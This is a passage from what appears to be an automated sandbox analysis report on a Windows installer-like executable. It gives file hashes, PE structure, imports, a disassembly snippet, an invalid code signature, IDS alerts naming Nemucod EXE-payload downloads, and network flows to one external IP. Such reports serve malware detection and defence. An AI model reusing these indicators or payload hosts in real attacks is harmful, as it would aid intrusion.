                                                                                                                  SSDEEP:48:o9YMAuERADl78E1g3e2OHBTTxE4+NaEIT9paYvo6su:gh7EQVXgt+NYgTnw6X
                                                                                                                  MD5:3220A6AEFB4FC719CC8849F060859169
                                                                                                                  SHA1:85F624DEBCEFD45FDFDF559AC2510A7D1501B412
                                                                                                                  SHA-256:988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
                                                                                                                  SHA-512:5C45EA8F64B3CDFB262C642BD36B08C822427150D28977AF33C9021A6316B6EFED83F3172C16343FD703D351AF3966B06926E5B33630D51B723709712689881D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS2 Windows, datetime=2008:07:08 14:20:15], baseline, precision 8, 166x312, components 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):29054
                                                                                                                  Entropy (8bit):5.195708227193176
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:wjV66AV66RU53DaYNg7y5fJ+dwd7L/dSivXHk4eo:wjs6As6R4aYyCfToi7R
                                                                                                                  MD5:AC40DED6736E08664F2D86A65C47EF60
                                                                                                                  SHA1:C352715BBF5AE6C93EEB30DF2C01B6F44FAEDAAA
                                                                                                                  SHA-256:F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
                                                                                                                  SHA-512:2FBD1C6190743EA9EF86F4CB805508BD5FFE05579519AFAFB55535D27F04F73AA7C980875818778B1178F8B0F7C6F5615FBF250B78E528903950499BBE78AC32
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):161070
                                                                                                                  Entropy (8bit):5.980129219920683
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:7AW0HGl6b15gOHTuZZcwbMy1IrX4+ofXXkk/:70TYfXU0
                                                                                                                  MD5:255D1FD903FFCB8D3001A313ED66B785
                                                                                                                  SHA1:6BEC09746DE218C108AB0EE78BBAF33CE6B04E7A
                                                                                                                  SHA-256:9005060548FB2AD85C0554B67CDB3B015E9A898A63E2B0D2352E09A29FD8A797
                                                                                                                  SHA-512:A20154B803A2B46F2625D2C2108054AC440F2B50F3282AE8A64B9E40E8C478EEE98021199B7BE258260048C60E4D39368E552D0448EF4B369118C1DA159EC06B
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:........CGlobalIncludeLuaFile.........Constant Definitions..XMB_OK=0;..MB_OKCANCEL=1;..MB_ABORTRETRYIGNORE=2;..MB_YESNOCANCEL=3;..MB_YESNO=4;..MB_RETRYCANCEL=5;..MB_ICONNONE=0;..MB_ICONSTOP=16;..MB_ICONQUESTION=32;..MB_ICONEXCLAMATION=48;..MB_ICONINFORMATION=64;..MB_DEFBUTTON1=0;..MB_DEFBUTTON2=256;..MB_DEFBUTTON3=512;..IDOK=1;..IDCANCEL=2;..IDABORT=3;..IDIGNORE=5;..IDRETRY=4;..IDYES=6;..IDNO=7;..SW_HIDE=0;..SW_SHOWNORMAL=1;..SW_NORMAL=1;..SW_MAXIMIZE=3;..SW_MINIMIZE=6;..HKEY_CLASSES_ROOT=0;..HKEY_CURRENT_CONFIG=1;..HKEY_CURRENT_USER=2;..HKEY_LOCAL_MACHINE=3;..HKEY_USERS=4;..REG_NONE=0;..REG_SZ=1;..REG_EXPAND_SZ=2;..REG_BINARY=3;..REG_DWORD=4;..REG_DWORD_LITTLE_ENDIAN=4;..REG_DWORD_BIG_ENDIAN=5;..REG_LINK=6;..REG_MULTI_SZ=7;..REG_RESOURCE_LIST=8;..REG_FULL_RESOURCE_DESCRIPTOR=9;..REG_RESOURCE_REQUIREMENTS_LIST=10;..DLL_CALL_CDECL=0;..DLL_CALL_STDCALL=1;..DLL_RETURN_TYPE_INTEGER=0;..DLL_RETURN_TYPE_LONG=1;..DLL_RETURN_TYPE_STRING=2;..SUBMITWEB_POST=0;..SUBMITWEB_GET=1;..ACCESS_READ=1310
                                                                                                                  Process:C:\Users\user\Desktop\Lets-x64.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5153280
                                                                                                                  Entropy (8bit):6.264110671248182
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:aYjdIw1TJyn5PPXDFFCMvSn/yRe4AloH1/coSNs5QKvbeGktKpGw+BbwPiBqkd96:SPZYxnMe4V/cJtKpGvJc5twG
                                                                                                                  MD5:2A7D5F8D3FB4AB753B226FD88D31453B
                                                                                                                  SHA1:2BA2F1E7D4C5FF02A730920F0796CEE9B174820C
                                                                                                                  SHA-256:879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
                                                                                                                  SHA-512:FA520EBF9E2626008F479C6E8F472514980D105F917C48AD638A64177D77C82A651C34ED3F28F3E39E67F12E50920503B66E373B5E92CF606BC81DC62A6B3EA4
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5.....X.)......2......6......d/.........`...../..............".........4....d..+....d.......d+......d,.....Rich....................PE..d...3..O..........".......5...........%........@..............................P.....DAO...@.................................................H:H......pN.......K.|H...........0O..,....................................................5.....87H.@....................text....5.......5................. ..`.rdata..*.....5.......5.............@..@.data.........H......vH.............@....pdata..|H....K..J...~I.............@..@text....."....M..$....K.............@.. data.....K... N..L....K.............@..@.rsrc........pN......8L.............@..@.reloc.......0O.......L.............@..B........................................................................................................................................
                                                                                                                  Process:C:\Users\user\Desktop\Lets-x64.exe
                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):337224
                                                                                                                  Entropy (8bit):6.4846248169411185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:J8bKN/3dhtovc2LAmB7jQaHU9ZW5NpFaQIuHmc6/nEPn:JqKN/NhKEIzdjQaHUe7OaME
                                                                                                                  MD5:958103E55C74427E5C66D7E18F3BF237
                                                                                                                  SHA1:CEA3FC512763DC2BA1CFA9B7CB7A46AE89D9FCD8
                                                                                                                  SHA-256:3EA4A4C3C6DEA44D8917B342E93D653F59D93E1F552ACE16E97E43BB04E951D8
                                                                                                                  SHA-512:02ED6E1F24EF8F7F1C0377FA86A3A494B8A4474472AB7001F7902F2F3AFA6CD975DC69FCAB6F5524545A67657ECCCFCD4ED2C95431843E9D50F2FFF4C5178DBE
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d...C\..g...d.......m...M...m.n.u...m.x.....m.i.e...m.j.e...Richd...........................PE..d....\mL.........." .........R..............................................p......w...............................................P.......`...(............ ...2......H....`.......................................................................................text...H........................... ..`.rdata..F...........................@..@.data...DA......."..................@....pdata...2... ...4..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2
                                                                                                                  Entropy (8bit):1.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:y:y
                                                                                                                  MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                  SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                  SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                  SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..
                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Entropy (8bit):7.761977901083295
                                                                                                                  TrID:
                                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:Lets-x64.exe
                                                                                                                  File size:21'353'869 bytes
                                                                                                                  MD5:a702cc254b31fbc4a5ec45fa16573521
                                                                                                                  SHA1:85c6aff84ebee14d9df214f1760a6bd4975e49ec
                                                                                                                  SHA256:887cf0ade18f096b4828e224f7f8a9fd2297c9fff930134e676af8b4d99455b9
                                                                                                                  SHA512:47b91de78c4aced688b0e09661b30b4d76a56d5c242d5416e63c744d3a107092b34b3728099cbc7e532b5f60e44067c97b3268dfefd579a39321a02f59d2a135
                                                                                                                  SSDEEP:393216:cec4Ie8M7oB2JNBXx9PMkglRy3mtFFu9zDVKZpV:FRh8B2vB2c+kZu
                                                                                                                  TLSH:E327015676F840E6D0BAC139C9928A4BD2F278410B35C7CF40905AAE1F777E24D2EF66
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>.V.P.V.P.V.P.M...i.P.M..._.P._..._.P.V.Q.2.P.M...O.P.M...W.P.M...W.P.RichV.P.........PE..d...L..O.........."......b...@.....
                                                                                                                  Icon Hash:d082a7a9cba28082
                                                                                                                  Entrypoint:0x140002d1c
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x140000000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x4FDA0E4C [Thu Jun 14 16:16:12 2012 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:2
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:2
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:2
                                                                                                                  Import Hash:357b59ff56f808887438b8bd8ad0eaa6
                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                  Error Number:-2146869232
                                                                                                                  Not Before, Not After
                                                                                                                  • 27/09/2018 20:00:00 01/02/2020 18:59:59
                                                                                                                  Subject Chain
                                                                                                                  • CN="Beijing Qihu Technology Co., Ltd.", OU=研发部, O="Beijing Qihu Technology Co., Ltd.", L=Beijing, S=Beijing, C=CN
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:E63D97F038C132F14F0E86E4383B7947
                                                                                                                  Thumbprint SHA-1:A50E0BABE5EE7DC261B0C122A8641A37E1CE4CE3
                                                                                                                  Thumbprint SHA-256:DBC27939DCD4AC7A333DD20BBC9AA254D0FFB691D2E0C2BD1F46A2ECF8C72002
                                                                                                                  Serial:4733BB6089E32FCD224D0E49DEB663DA
Instruction
dec eax
sub esp, 28h
call 00007FDC60BAABE0h
dec eax
add esp, 28h
jmp 00007FDC60BA8A37h
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
dec eax
mov dword ptr [esp+18h], edi
inc ecx
push esp
dec eax
sub esp, 20h
dec esp
lea esp, dword ptr [00009324h]
xor esi, esi
xor ebx, ebx
dec ecx
mov edi, esp
cmp dword ptr [edi+08h], 01h
jne 00007FDC60BA8C08h
dec eax
arpl si, ax
mov edx, 00000FA0h
inc esi
dec eax
lea ecx, dword ptr [eax+eax*4]
dec eax
lea eax, dword ptr [0000A232h]
dec eax
lea ecx, dword ptr [eax+ecx*8]
dec eax
mov dword ptr [edi], ecx
call dword ptr [000053FDh]
test eax, eax
je 00007FDC60BA8C08h
inc ebx
dec eax
add edi, 10h
cmp ebx, 24h
jl 00007FDC60BA8BABh
mov eax, 00000001h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
mov edi, dword ptr [esp+40h]
dec eax
add esp, 20h
inc ecx
pop esp
ret
dec eax
arpl bx, ax
dec eax
add eax, eax
dec ecx
and dword ptr [esp+eax*8], 00000000h
xor eax, eax
jmp 00007FDC60BA8BBDh
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 20h
mov edi, 00000024h
dec eax
lea ebx, dword ptr [0000929Ch]
mov esi, edi
dec eax
mov ebp, dword ptr [ebx]
dec eax
test ebp, ebp
je 00007FDC60BA8BFDh
cmp dword ptr [ebx+08h], 01h
je 00007FDC60BA8BF7h
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [ASM] VS2010 SP1 build 40219
• [IMP] VS2008 SP1 build 30729
• [C++] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaf7c | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x1ebbb | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xf000 | 0x5d0 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1459e25 | 0x3768 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2f000 | 0x22c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2f8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x61d3 | 0x6200 | 46565b91f365f59e95911f623cd509ca | False | 0.5916374362244898 | data | 6.245804251873142 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x3948 | 0x3a00 | 9a2a098011201debfdbe2790cfc39397 | False | 0.3455010775862069 | dBase III DBT, version number 0, next free block index 46396, 1st item "j\267" | 4.71737238820107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x2200 | 0x1000 | ffa6e0e76a954e6a3fd657281ecc2607 | False | 0.1767578125 | data | 2.232690021204779 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xf000 | 0x5d0 | 0x600 | b0c923173cdcf0b82f939c3fafc6e4d7 | False | 0.4954427083333333 | data | 4.252873747775349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x10000 | 0x1ebbb | 0x1ec00 | 926e091618694e537b00d3d9325e5945 | False | 0.20641990599593496 | data | 4.868795024593366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2f000 | 0x3de | 0x400 | 3e80cb8268adc697616a87179e434ae9 | False | 0.3896484375 | data | 3.553072991109634 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x10640 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | - | - | 0.4772727272727273
RT_BITMAP | 0x10774 | 0x328 | Device independent bitmap graphic, 16 x 16 x 24, image size 768 | - | - | 0.10024752475247525
RT_ICON | 0x10a9c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | - | - | 0.24878048780487805
RT_ICON | 0x11104 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | - | - | 0.33602150537634407
RT_ICON | 0x113ec | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | - | - | 0.35450819672131145
RT_ICON | 0x115d4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | - | - | 0.41216216216216217
RT_ICON | 0x116fc | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | - | - | 0.3744669509594883
RT_ICON | 0x125a4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | - | - | 0.30866425992779783
RT_ICON | 0x12e4c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | - | - | 0.32142857142857145
RT_ICON | 0x13514 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | - | - | 0.2543352601156069
RT_ICON | 0x13a7c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | - | - | 0.09291080089908908
RT_ICON | 0x242a4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | - | - | 0.16190363722248466
RT_ICON | 0x284cc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | - | - | 0.22448132780082988
RT_ICON | 0x2aa74 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | - | - | 0.324812382739212
RT_ICON | 0x2bb1c | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | - | - | 0.414344262295082
RT_ICON | 0x2c4a4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | - | - | 0.5434397163120568
RT_DIALOG | 0x2c90c | 0x6c | data | Chinese | China | 0.8148148148148148
RT_DIALOG | 0x2c978 | 0x54 | data | Chinese | China | 0.8333333333333334
RT_DIALOG | 0x2c9cc | 0x40 | data | Chinese | China | 0.75
RT_DIALOG | 0x2ca0c | 0x54 | data | Chinese | China | 0.8333333333333334
RT_STRING | 0x2ca60 | 0x58 | Matlab v4 mat-file (little endian) \367\213\011\220\351b\006R\250\217\207s'Y\216N8, numeric, rows 0, columns 0 | Chinese | China | 0.8068181818181818
RT_RCDATA | 0x2cab8 | 0x80 | data | English | United States | 1.0859375
RT_RCDATA | 0x2cb38 | 0x80 | ISO-8859 text, with no line terminators | Chinese | China | 0.09375
RT_GROUP_CURSOR | 0x2cbb8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | - | - | 1.25
RT_GROUP_ICON | 0x2cbcc | 0xca | data | - | - | 0.6089108910891089
RT_VERSION | 0x2cc98 | 0x2e0 | data | Chinese | China | 0.49320652173913043
RT_MANIFEST | 0x2cf78 | 0x4d3 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.47692307692307695
None | 0x2d44c | 0x176f | data | - | - | 1.0018336389398232
DLL | Import
KERNEL32.dll | _lclose, GetModuleFileNameA, _lread, _llseek, _lopen, _lwrite, _lcreat, CreateDirectoryA, SetCurrentDirectoryA, lstrcatA, FreeLibrary, GetProcAddress, LoadLibraryA, GetDiskFreeSpaceA, GetFileAttributesA, RemoveDirectoryA, DeleteFileA, lstrlenA, GetCurrentDirectoryA, CloseHandle, GetExitCodeProcess, GetLastError, LocalFree, GetCurrentProcess, MoveFileExA, Sleep, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapReAlloc, HeapSize, IsValidCodePage, lstrcpyA, GetTempPathA, CompareStringA, GetOEMCP, GetACP, GetModuleHandleW, ExitProcess, DecodePointer, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, EncodePointer, LoadLibraryW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, TerminateProcess, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, RtlUnwindEx, WriteFile, GetStdHandle, GetModuleFileNameW, HeapSetInformation, GetVersion, HeapCreate, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo
USER32.dll | TranslateMessage, DispatchMessageA, PeekMessageA, wsprintfA, LoadCursorA, SetCursor, MessageBoxA, MsgWaitForMultipleObjects
ADVAPI32.dll | GetTokenInformation, OpenProcessToken
SHELL32.dll | ShellExecuteExA
Language of compilation system | Country where language is spoken
Chinese | China
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-29T16:09:26.781807+0100 | 2022482 | ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 | 1 | 192.168.2.5 | 49717 | 104.21.81.224 | 80 | TCP
2024-12-29T16:09:29.499309+0100 | 2022482 | ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 | 1 | 192.168.2.5 | 49720 | 104.21.81.224 | 443 | TCP
2024-12-29T16:09:29.920224+0100 | 2021954 | ET MALWARE JS/Nemucod.M.gen downloading EXE payload | 1 | 104.21.81.224 | 443 | 192.168.2.5 | 49720 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 29, 2024 16:09:25.429605007 CET | 49717 | 80 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:25.550671101 CET | 80 | 49717 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:25.551067114 CET | 49717 | 80 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:25.551390886 CET | 49717 | 80 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:25.672430992 CET | 80 | 49717 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:26.781719923 CET | 80 | 49717 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:26.781806946 CET | 49717 | 80 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:26.784225941 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:26.784284115 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:26.784363031 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:26.793432951 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:26.793466091 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:28.130275965 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:28.130362034 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:28.194531918 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:28.194566011 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:28.195027113 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:28.195091009 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:28.196537971 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:28.243331909 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499310017 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499356985 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499382973 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499388933 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.499406099 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499433994 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499454021 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.499454021 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.499504089 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499547005 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.499555111 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.499603033 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.507466078 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.507524014 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.507531881 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.507575035 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.515944004 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.516028881 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.516037941 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.516086102 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.524389029 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.526247025 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.709577084 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.709641933 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.709666967 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.709709883 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.713407040 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.713474989 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.719640970 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.719696999 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
Dec 29, 2024 16:09:29.719768047 CET | 443 | 49720 | 104.21.81.224 | 192.168.2.5
Dec 29, 2024 16:09:29.719810963 CET | 49720 | 443 | 192.168.2.5 | 104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.727516890 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.727619886 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.727634907 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.727797031 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.735572100 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.735615969 CET49720443192.168.2.5104.21.81.224
